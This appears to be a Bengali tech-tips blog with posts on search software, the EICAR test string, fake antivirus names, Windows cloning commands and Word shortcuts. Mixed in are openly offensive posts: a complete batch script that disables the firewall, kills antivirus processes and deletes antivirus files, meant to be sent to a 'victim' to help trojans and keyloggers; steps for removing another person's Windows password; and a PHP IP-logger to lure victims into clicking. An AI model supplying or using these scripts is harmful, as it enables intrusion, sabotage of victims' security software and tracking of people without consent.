আসসালামু আলাইকুম

বুধবার, ১১ এপ্রিল, ২০১২

আমার মত যারা ভুলো মনা তাদের জন্য অসম্ভব স্পিডি একটি ডেক্সটপ সার্চিং সফটওয়্যার। কম্পিউটারের ফাইল খুজতে এর জুড়ি নেই। আর যারা উইন্ডোজের ডিফল্ট সার্চিং এর লোডিং ………. দেখতে দেখতে রীতিমত বিরক্ত তারা নির্ধিদ্বায় ডাউনলোড করতে পারেন। একদম সাদামাটা ইন্টারফেস আর নিমিষেই সাচিং রেজাল্ট সমৃদ্ধ।সর্বোপরি অবশ্যই ফ্রি সফটওয়্যার।


চলুন এক নজরে দেখে নেই এর ফিচার গুলো

–> খুবই ছোট ইন্সটলার সাইজ (মাত্র 344KB)।

–> সাদামাটা ইউজার ইন্টারফেস।

–> দ্রুত ইনডেক্সিং (কম্পিউটার স্লো করে না)

–> অত্যন্ত দ্রুত গতির সার্চিং রেজাল্ট (ইন্সট্যান্ট সার্চিং রেজাল্ট)

–> রিয়েলটাইম আপডেটিং

–> র‌্যাম ইউজ করে খুবই কম

আর দেরী নয় ডাউনলোড করুন এখান থেকে

আপনি জানেন কি আপনার antivirus টা কি কাজ করছে কি না?

কেমন আছেন সবাই। আজকে একটা অন্য রকম পোস্ট সবার সাথে শেয়ার করবো। মনে হয় অনেক-ই জানেন,তারপরও কিছু নতুন এবং ভিন্ন ভাবে আমি এই পোস্ট টা সবার সামনে উপস্থাপন করলাম।

আপনি জানেন কি আপনার অ্যান্টিভাইরাস টা কি কাজ করছে কি না ?

তাহলে এখন আমরা কথা এখন কাজের কথায় যাবো , প্রথমে আপনার সিস্টেম থেকে নোট ওপেন করেন >>>>>>>

এখন নোট প্যাড ওপেন করে ,নিচের লিখা টা হুবুহু কপি করে নোট প্যাডে পেস্ট করেনঃ >>>>>>>


X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

এখন সেভ করার সময় নাম দিবেনঃ save as > test.com

এখন এটা ওপেন করার সাথে সাথে যদি এটা ডিলেট হয়ে যায়,তাহলে মনে করবেন আপনার অ্যান্টিভাইরাস টা ঠিক মতো কাজ করছে ।যদি ডিলেট না হয় ,তাহলে মনে করবেন

সাথে দেখে নিন কিছু ফেক অ্যান্টিভাইরাস এর লিস্টঃ

PC Security 2011

ThinkPoint

ThinkSmart

Antivirus 8

Security Tool

My Security Shield

Antivirus 7

Antivirus GT

Defense Center

Protection Center

Sysinternals Antivirus

Security Master AV

CleanUp Antivirus

Security Toolbar

Digital Protection

XP Smart Security 2010

Antivirus Suite

Vista Security Tool 2010

Total XP Security

Security Central

Security Antivirus

Total PC Defender 2010

Vista Antivirus Pro 2010

Your PC Protector

Vista Internet Security 2010

XP Guardian

Vista Guardian 2010

Antivirus Soft

XP Internet Security 2010

Antivir 2010

Live PC Care

Malware Defense

Internet Security 2010

Desktop Defender 2010

Antivirus Live

Personal Security

Cyber Security

Alpha Antivirus

Windows Enterprise Suite

Security Center

Control Center

Braviax

Windows Police Pro

Antivirus Pro 2010

PC Antispyware 2010

FraudTool.MalwareProtector.d

Winshield2009.com

Green AV

Windows Protection Suite

Total Security 2009

Windows System Suite

Antivirus BEST

System Security

Personal Antivirus

System Security 2009

Malware Doctor

Antivirus System Pro

WinPC Defender

Anti-Virus-1

Spyware Guard 2008

System Guard 2009

Antivirus 2009

Antivirus 2010

Antivirus Pro 2009

Antivirus 360

MS Antispyware 2009

IGuardPC or I Guard PC

Additional Guard

এই সব অ্যান্টিভাইরাস গুলো ভুলেও পিসি তে ইন্সটল করবেন না ,তাহলে আপনার উইন্ডোজ এর প্রবলেম হবে । চিনে রাখুন ।

রবিবার, ৮ এপ্রিল, ২০১২

Media fire এ resume support করুন খুব সহজে। (নতুন পদ্ধতি)

আজকে আমি আপনাদের সাথে শেয়ার করবো কিভাবে অতি সহজে আমরা media fire থেকে resume সাপোর্ট করে ফাইল ডাউনলোড করতে পারি। আমি এখন আপনাদেরকে একটি ছোট সফটওয়্যার শেয়ার করবো। সফটওয়্যারটার সাইজ হচ্ছে মাত্র ৯৬০ কেবি। এই সফটওয়্যার দিয়ে আপনি media fire এর ফাইল ডাউনলোড করলে। সারা জীবন resume সাপোর্ট করে রাখতে পারবেন। সফটওয়্যারটি ডাউনলোড করতে নিচের লিঙ্ক এ ক্লিক করেন।

http://www.mediafire.com/?6z17sn82rs8818c


ডাউনলোড শেষ হলে আপনি এই সফটওয়্যার তা ওপেন করুন। লিঙ্ক (Direct link downloader)এর ঘরে mediafire এর লিঙ্ক তা paste করুন।

Like: (http://www.mediafire.com/?6z17sn82rs8818c)

এরপর ডাউনলোড এ ক্লিক করুন। ৩ সেকেন্ড অপেক্ষা করুন তারপর ডাউনলোড Automatic স্টার্ট হয়ে যাবে আপনার INTERNET DOWNLOAD MANAGER এ।



Now Enjoy with Premium Download from Mediafire.com



পোস্টটি ভালো লাগলে কমেন্টস করবেন।

Windows 8 এ .NET framework 3.5 কিভাবে ডাউনলোড না করে এনাবল করবেন?!

.NET framework উইন্ডোজ এ সফটওয়্যার চালানোর জন্য অনেক গুরুত্বপূর্ণ। অনেক সফটওয়্যার চলবেই না; কিন্তু দুঃখের বিষয় by default এটা ডিসেবল থাকে। এটা না থাকলে কোনও সফটওয়্যার রান করতে গেলে হয়তো নিচের ছবির মত একটা মেসেজ আসে:::

এটা enable করতে হলে আগে আপনাকে control panel থেকে programs and features এ যেতে হবে।। এটা মোটামুটি বড় ফাইল, ডাউনলোড করতে অনেক কষ্ট।

আবার উপরের ছবির প্রথম অপশন এ টিক দিয়ে ওকে করলে অনেকে এই Error 0x800f0906 এররটা পায়। আবার এখন ডাউনলোড করতে গেলে আপনাকে ২৯১ মেগা ডাউনলোড করতে হবে যা লিমিটেড ইউসারদের জন্য কষ্টকর।।



Windows 8 Consumer Preview তে কিভাবে কোনও কিছু ডাউনলোড ছাড়া আপনি এটা enable করবেন, তা দেখাবো, অন্য কোনটাতে এই ট্রিক আমি অ্যাপ্লাই করিনি।



Step 01► .iso ফাইলটা কম্প্রেশন/ ডিকম্প্রেশন সফটওয়্যার যেমন 7-zip দিয়ে ওপেন করে Sources ফোল্ডার ওপেন করুন ও sxs ফোল্ডার খুঁজে বের করুন।। এবার এটা এখানে কপি করুন >>

C:\ Temp

Step 02► এবার এডমিনিস্ট্রেটর হিসেবে কমান্ড প্রম্পট রান করে নিচেরটুকু টাইপ করে এন্টার দিন:::
dism.exe /online /enable-feature /featurename:NetFX3 /All /Source:c:\temp\sxs /LimitAccess

কাজ শেষ, এবার রিবুট করুন দেখেন যে ২য় ছবির প্রথম অপশন এ টিক দেয়া!!

এবার তাহলে মনমত সফটওয়্যার চালান যেমন Autocad!! ২৯১ মেগা বেঁচে গেলো!!

বার বার windows সেটআপ এবং software ইন্সটল করা বাদ দিয়ে পুরনো সমস্ত সফটওয়্যার সহ উইন্ডোজ কপি করে ফেলুন

উইন্ডোজ ইন্সটল করার ঝামেলা আর কতদিন তাই না? আর কত? তাই এবার মজার জিনিস নিয়ে এসেছি সবার জন্য। ১০০% কাজে লাগবেই। বার বার আর উইন্ডোজ ইন্সটল করতে হবে না আপনার। সাধারণত উইন্ডোজ সেটআপ দিলে পুরনো সফটওয়্যার গুলো আবার নতুন করে ইন্সটল করতে হয় তাই না? কিন্তু উইন্ডোজ ৭ এর মাঝে এমন একটি সুবিধা আছে যা দিয়ে আপনাকে পুরনো সফটওয়্যার গুলো আর নতুন করে ইন্সটল করতে হবে না এবং উইন্ডোজ ও সেটআপ দিতে হবে না।



কেনো করবেন?

মনে করেন কোন কারনে আপনার হার্ড ডিস্ক এর সি ড্রাইভ ক্রেশ করে ফেলেছে তখন আপনার পুরনো সমস্ত সফটওয়্যার মুছে যাবে। তাছারা নানান কারনে আমাদের উইন্ডোজ সেটআপ দিতে হয়। এই সিস্টেম এর সাহায্যে আপনাকে বার বার উইন্ডোজ সেটআপ দিতে হবে না। আবার মজার কথা হল একবার এটি বানিয়ে রাখলে আপনি যে কোন কম্পিউটার এ এটি হুবুহু কপি করতে পারবেন।

কিভাবে এটি কাজ করে?

সিস্টেম টি আসলে খুব সহজ এটি আসলে একটি হার্ড ডিস্ক থেকে আরেকটি হার্ড ডিস্ক এর মাঝে সি ড্রাইভের সমস্ত ডাটা কপি করে। সি ড্রাইভের সমস্ত কিছু একটি হার্ড ডিস্ক থেকে আরেকটি হার্ড ডিস্ক এর মাঝে কপি করে ফেলে। অনেক দোকানে এভাবেই একটি মাস্টার হার্ড ডিস্ক বানিয়ে রাখে পরে এক্তির পরে একটি কম্পিউটার এর মাঝে শুধু কপি করতে থাকে। এতে অনেক বেশি সময় কম লাগে যদি কমান্ড গুলো একবার মুখস্থ করে ফেলতে পারেন।

কি কি লাগবে?

এদ্ভান্স লেভেল এর নলেজ লাগবে। যে কমান্ড প্রমট এ আগে কাজ করেছেন।

কাজটি করতে আপনার ২টি এইচডিডি লাগবে । কিছু করার নাই কষ্ট করতে না চাইলে ২তা হার্ড ডিস্ক মানেজ করতেই হবে।

আরেকজনের পিসিতে সেটআপ দিতে চাইলে হার্ডওয়্যার এক রকম হতে হবে।

শুরু করুনঃ-
১। প্রথমে একটি এক্সট্রা হার্ড ডিস্কে পিসি নতুন করে সেটআপ করুন সাধারণ ভাবে। আপনার পিসিতে সমস্ত কিছু সুন্দর ভাবে ইন্সটল করে নিন। যা যা সফটওয়্যার আপনার লাগে। এন্টি ভাইরাস লাগিয়ে স্কেন করে নিন।এই হার্ড ডিস্ক টি ছোট হতে পারবে তবে এটি সব সময় আলাদা করে সেভ করে রাখবেন। এটাই মাস্টার ডিস্ক হবে আমাদের। প্রতিবার এখান থেকে আমরা সব কিছু কপি করে নিব।

২। এখন আপনার রেগুলার হার্ড ডিস্ক যুক্ত করে উইন্ডোজ ৭ এর সিডি প্রবেশ করিয়ে পিসি রিস্টার্ট মারেন।

৩। এবার “Repair your computer” দিন।

৪। তারপরে SHIFT+F10 চাপুন কমান্ড লাইন আসার জন্য।

৫। টাইপ করুন DISKPART আপনার নতুন মানে রেগুলার হার্ড ডিস্ক এর মাঝে primary partition তৈরি করতে।

diskpart

list disk

select disk 1

create partition primary size=30000

list partition

select partition 0

format fs=ntfs quick

active
৬। diskpart এর মাঝে আপনার মাস্টার / পুরনো হার্ড ডিস্ক সিলেক্ট করুন এবং আপনার পুরনো হার্ড ডিস্ক টি assign করুন non-C ড্রাইভ হিসাবে যেমন হতে পারে H, J, K

select disk 0

list partition

select partition 0

assign letter=H:
7. DISKPART এর মাঝে সেই partition তা সিলেক্ট করুন যেটি আপনি ৫নং স্টেপ এর মাঝে করেছেন। এবং এটিকে assign করুন ড্রাইভ C: হিসাবে।

৮। diskpart বের হয়ে যান। DIR command ব্যবহার করে দেখে নিন ড্রাইভ লেটার চেঞ্জ হয়েছে নাকি।

DIR C:

DIR H:
৯ এবার নিচের কমান্ড দিয়ে পুরনো হার্ড ডিস্ক এর সিস্টেম গুলো কপি করে নিন হার্ড ডিস্ক এর মাঝে।

robocopy h:\ c:\ /mir /copy:datso /r:2 /w:2 /zb /np /tee /log:rbcp.log
১০। boot sector তৈরি করুন নিজের কমান্ড দিয়ে।

bootsect /nt60 C:
১১। পিসি shutdown করে মাস্টার হার্ড ডিস্ক মানে পুরনো হার্ড ডিস্ক খুলে ফেলুন এবং আবার পিসি চালু করে দিন। বাস কাজ শেষ এবার দেখুন নতুন হার্ড ডিস্ক এর মাঝে পুরনো সমস্ত সফটওয়্যার সহ উইন্ডোজ সেটআপ হয়ে গেছে।

১২। যদি সিস্টেম আপনাকে পিসি repair করতে বলে তাহলে জাস্ট windows 7 installation সিডি প্রবেশ করে repair করুন automatically

১৩। সরি নতুন বন্ধুদের কাজটা অনেক কঠিন মনে হতে পারে। এর থেকেও সহজ উপায় আছে আরেকটা সময় পেলেই লিখতে বসে যাবো।

বুধবার, ৪ এপ্রিল, ২০১২

///// হ্যাক করুন AnTi-ViRuS \\\\\

আজ আপনাদের জন্য একটি মজার টিপস্ নিয়ে এসেছি ।।। আপনিও এবার আপনার ভিক্টিমের AnTi-ViRuS ডিজেবল করতে পারবেন ।।। এজন্য আমরা Batch program ব্যবহার করবো ।।।


নিচের কোডটি কপি করে নোডপ্যাড ওপেন করে পেস্ট করুন ।।।

ফাইলটি .bat extension এ সেভ করুন ।।।।


@ echo off
rem –
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem –

ফাইলটি ভিক্টিমের কাছে পাঠান …ভিক্টিম ফাইল এ ক্লিক করলেই কাজ শেষ ।

এটি আপনাকে হ্যাকিং এ প্রচুর সাহায্য করবে ।।।
বিশেষ করে কী লগার , ট্রোজান কে ভালো ভাবে কাজ করাতে antivirus ডিজেবল করা আবশ্যক ।

বোকাদের মতো নিজেই উক্ত ফাইলে ক্লিক কইরেন না ।।।
ভালো থাকুন , আজ এই পর্যন্তই ।।।।

Autorun.inf Virus বন্ধ করুন একটি সুন্দর Software দিয়ে

Softwareটির পরিচিতি?

Softwareটির নাম হল Rising Pc Doctor. নাম শুনেই বুঝতে পারছেন Softwareটির কাজ কি ধরনের। এই Softwareটি ব্যবহার করলে আপনার PC-তে autorun virus ডুকতে পারবে না। এছাড়াও আপনি Softwareটি দিয়ে আপনার PC-তে কোন Spyware বা Trojan Virur আছে কিনা তা Scan করে দেখতে পারবেন এবং থাকলে Delete করতে পারবেন। Softwareটি দিয়ে Pc এর Temporary File গুলোও Delete করা যায়। এছাড়াও এর বেশ কিছু কাজ আছে।



কিভাবে ব্যবহার করব?

Download শেষে Softwareটি করে Setup দিয়ে নিন।

1.এরপর Softwareটি Open করুন Desktop এর Rising PC Doctor Shortcutটিতে Click করে।

2.Softwareটি Open হলে আপনি Common Functions এ থাকবেন। এখন আপনি এখান থেকে Spyware বা Trojan Virus Scan করতে পারবেন।

3.এখন যদি Spyware Virus Scan করে পাওয়া যায় তাহলে Select All এ Click করে Remove Now Button এ Click করুন।

4.যদি Trojan Virus Scan করতে চান তাহলে Scan For Trojans Button এ Click করুন। এরপর Scan Object থেকে Select All এ Click করে Start Scan Button এ Click করুন।

যদি Virus পাওয়া যায় তাহলে Select All এ Click করে Kill Now Button এ Click করুন।

5.আপনি যদি Temporary File Delete করতে চান তাহলে Expert Tools এ Click করে Empty Bin Button এ Click করুন। এরপর নিচের দিকে Select All এ Click করে Start Scan Button এ Click করুন।

এখন Scan শেষ হলে আপনি Temporary File গুলোর Size এবং Location দেখতে পারবেন। Temporary File গুলো Delete করার জন্য Clear All Button এ Click করুন।

6.আপনি যদি চান কোন ধরনের Device যেমনঃ Pendrive/Removal Disk থেকে যেন autorun.inf virus আপনার PC-তে আসতে না পারে সেজন্য আপনাকে Automatic Protection এ Click করতে হবে। এখান থেকে Local Protection এ Click করুন এবং Immunize USB Media Enable করে দিন Enable Button এ Click করে।

যদি Enable হয়ে যায় তহলে তা ছবিতে Mark করা অংশটির মত দেখা যাবে। এরপর যদি আপনার Pc কোন Drive লাগানো হয় তাহলে Softeareটি autorun.inf নামে একটি Folder Driveটিতে খুলে দিবে autorun.inf virus থাকুক আর না থাকুক। যদি থাকে তাহলে তাকে Delete করে কাজটি করবে। আপনি অনেক সময় দেখবেন যে আপনর লাগানো Drive-টিতে Autorun.inf নামের Folder দেখা যাচ্ছেনা তাতে কোন সমস্যা নেই । যদি ঐ Drive-টিতে আগে থেকেই autorun.inf Virus বা Autorun.inf নামের Folder থাকে সে ক্ষেত্রে Softwareটি Virusটি Delete করে বা Autorun.inf নামের Folderটি Delete করে নতুন করে Autorun.inf নামের Folder খুলবে এবং তখন Folderটিকে Hidden করে রাখবে। আপনি Hidden File Show দিলেই তা দেখতে পারবেন।


7.এই Softwareটি আপনাকে Internet Protection দিবে। এটির দ্বারা আপনি URl Alert, IE Protection এবং Trojan Download Bloker Protection পাবেন যা কিনা Softwareটি নিজে নিজেই Enable করে নেবে।

8. আপনি Softwareটি দিয়ে Start Up Contorl করতে পারবেন। System Repair করে পারবেন। এজন্য আপনাকে Expert Tools এ যেতে হবে। এখান থেকে আপনার প্রয়োজন মত অন্যান্য Tools গুলো ব্যবহার করতে পারবেন।

Rising PC Doctor Download করব কোথায় থেকে?



http://www.softpedia.com/progDownload/Rising-PC-Doctor-Download-122985.html এই Link থেকে Softwareটির Latest Version Freeতে Download করতে External mirror 1 [EXE] তে Click করুন। Softwareটির Memory হল 9.08MB । আমি Softwareটি ব্যবহার করছি এটা বেশ কাজের।

মঙ্গলবার, ৩ এপ্রিল, ২০১২

PC DOCTOR::কি বোর্ড এর ALT এর কিছু সাধারণ কাজ[ MICROSOFT WORD - ২০০৭ ] + ♥♥♥

সবাইকে আবারও স্বাগতম । সবাই কেমন আছেন ? আশা করি ভাল আছেন + ভাল থাকবেন আজ আমি ALT এর কিছু সাধারণ কাজ সম্পর্কে বলব – [ MICROSOFT WORD-2007 এই শটকাট ভাল কাজ করবে ] “অজানাদের জন্য” ::



0১. ALT+F চাপলে মেনুবার আসবে ।

0২. ALT+1 চাপলে অটো SAVE হবে ।

0৩. ALT+২ চাপলে লেকার ্নডু অপশন আসবে ।

0৪. ALT+H চাপলে MICROSOFT WORD এর HOME অপশনে যাবে ।

0৫. ALT+N চাপলে MICROSOFT WORD এর INSERT অপশনে যাবে ।

০৬. ALT+P চাপলে MICROSOFT WORD এর Pge Layout অপশনে যাবে ।

0৭. ALT+S চাপলে MICROSOFT WORD এর References অপশনে যাবে ।

0৮. ALT+M চাপলে MICROSOFT WORD এর Mailing অপশনে যাবে ।

0৯. ALT+R চাপলে MICROSOFT WORD এর Review অপশনে যাবে ।

১০. ALT+W চাপলে MICROSOFT WORD এর View অপশনে যাবে ।

১১. ALT+X চাপলে MICROSOFT WORD এর Add – INS অপশনে যাবে ।

সহজ উপায়ে পিসির ইউজার পাসওয়ার্ড হ্যাক

শুভ অপরাহ্ণ । আমার টিউনের শিরোনামটা হতে পারত ইউজার পাসওয়ার্ড পুনরুদ্ধার । কেউ যদি তার নিজের কম্পিউটারে এই পদ্ধতিটা ব্যবহার করেন সেক্ষেত্রে এই কথাটা প্রযোজ্য তবে কেউ যদি অপরের কম্পিউটারে এটা প্রয়োগ করেন তবে সেটা অবশ্যই হ্যাকিং এর আওতায় পড়ে কারন হ্যাকিং এর মুল সংজ্ঞাই হল অনুমতিহীন অনুপ্রবেশ । যাই হোক, কেউ যদি নিজের কম্পিউটারে দেয়া পাসওয়ার্ড ভুলে গিয়ে থাকেন বা কারো ইউজার পাসওয়ার্ড ভেঙ্গে তার পিসি এক্সেস করতে চান তবে নিচের এই সহজ ধাপগুলো অনুসরন করুনঃ

# আপনার পিসিকে Safe mode এ অন করুন । (Safe mode এ রান করাতে হলে পিসির সুইচ অন করে bios message প্রদর্শন করার পরে F8 বাটন চাপুন তারপর Menu থেকে Safe mode সিলেক্ট করে এন্টার চাপুন)।

# এবার Login Screen আসলে Administration সিলেক্ট করুন । এতে কম্পিউটারটি Safe mode এ চালু হবে ।

# এখন Start>Settings>Control panel এ ক্লিক করুন । নিচের মত উইন্ডো আসবে-

# User accounts এ ক্লিক করুন ।

# or pick an account to change এর নিচে user account(বা কোন নামও হতে পারে, এখানে mrkm…com আছে) সিলেক্ট করুন । তারপর-

# Remove password এ ক্লিক করুন । সর্বশেষ,

# Remove password এ ক্লিক করুন ।

এখন কম্পিউটারটি Restart করুন । দেখুন কোন রকম পাসওয়ার্ড ছাড়াই পিসি অন হয়ে গেছে ।

আপনি চাইলে পুরনো পাসওয়ার্ডটিও খুজে বের করতে পারেন যা Microsoft তার system32 ফোল্ডারের ভিতর সেভ করে রাখে তবে এজন্য আপনাকে প্রোগ্রামিং কোড সম্বন্ধে কিছু ধারনা থাকতে হবে। এ ব্যপারে আরেকটি টিউনে বিস্তারিত লিখব । আজ এ পর্যন্তই । ধন্যবাদ সবাইকে ।

এবার যে কারও এবার আইপি সনাক্ত করুন

আসসালামু আলাইকুম, সবাইকে আবারও স্বাগতম আজকের টিউনে। কেমন আছেন সবাই? আশা করি মহান সৃষ্টিকর্তার অশেষ রহমতে খুবই ভাল আছেন। আজ আপনাদের জন্য নিয়ে এলাম একটি মজার জিনিস। কি জিনিস? হা হা হা হা। বুঝে ফেলেছেন! ভাল, খুবই ভাল। আপনাদের অনেক বুদ্ধি হয়েছে। আমি জানি না যে, টিউনার পেজ থেকে আপনারা কেমন সুবিধা পাচ্ছেন। মানে টিউনারপেজ থেকে আপনারা আপনাদের প্রয়োজনীয় সব কিছু পাচ্ছেন কিনা? আশা করি সমস্যা হওয়ার কথা না। যাক, আজকের টিউনে ফিরে আসি…


বিভিন্ন ক্ষেত্রে আমাদের অন্যের IP এড্রেস প্রয়োজন হয়। বিশেষ করে যখন আপনি সাধারণ হ্যাকিং করবেন, তখন আপনাকে আপনার ভিকটিমের IP address জানতেই হবে। না হলে আপনি তার কিছুই করতে পারবেন না। এখন আপনি ভাবছেন যে, কীভাবে আমি IP address বের করবো? কোন সমস্যাই নেই। “অনির্বাচিত টিউনার” আছে, তাই আশা করি এখনকার মতো সমস্যার সমাধান হবে। হা হা হা হা হাহা। এখন আমরা একটি .php পেজ তৈরি করব। আপনি প্রথমে নিচের কোডগুলো কপি করে নোটপ্যাডে পেষ্ট করুন। এবার File –> Save as এ ক্লিক করুন। এবার File Name এ লিখুন tunerpage.php এবার সেভ করুন। তবে অবশ্যই আপনি যে নামই দেন না কেন, নামের শেষে .php অবশ্যই দিবেন।

এবার কোডটি নিনঃ


$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);

$img_number = imagecreate(400,95);

$backcolor = imagecolorallocate($img_number,10,102,153);

$textcolor = imagecolorallocate($img_number,255,255,255);



imagefill($img_number,0,0,$backcolor);

$number0 = ” This is Your IP/Proxy”;

$number1 = ” IP: $_SERVER[HTTP_X_FORWARDED_FOR]“;

$number2 = ” Host/Proxy: $hostname”;

$number4 = ” _________________________________”;



Imagestring($img_number,10,5,5,$number0,$textcolor);

Imagestring($img_number,10,5,25,$number1,$textcolor);

Imagestring($img_number,10,5,45,$number2,$textcolor);

Imagestring($img_number,10,5,50,$number4,$textcolor);

Imagestring($img_number,10,8,50,$number4,$textcolor);

Imagestring($img_number,10,5,10,$number4,$textcolor);

Imagestring($img_number,10,8,10,$number4,$textcolor);



header(“Content-type: image/png”);

imagepng($img_number);

$file=fopen(“Name-here-to-protect-the-File.txt”,”a”);

$file2 = “- IP joined – IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] – Host: $hostname – ‘\n’ “;

fwrite($file, $file2);

fclose($file);

?>

এবার আপনার .php ফাইলটি যে কোন ফ্রি ফাই্ল হোষ্টিং সাই্টে আপলোড করুন। যেমন- www.my3gb.com বা www.ripway.com.
এবার আপনার লিংকটি আপনার ভিকটিমের মেইলে পাঠান। তবে সাথে অবশ্যই এমন কিছু কথা লিখবেন, যাতে সে লোভে পড়ে যায়।
এবার যদি আপনার ভিকটিম কোন রকমে লিংকে ক্লিক করে, তাহলে তার আইপি আপনার হোষ্টিং সাইটে সেভ হয়ে যাবে।
এবার আপনার কাজে আইপিটি ব্যবহার করুন।
সবাইকে অনেক অনেক ধন্যবাদ। ভাল থাকবেন, আল্লাহ হাফেজ…………………..

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More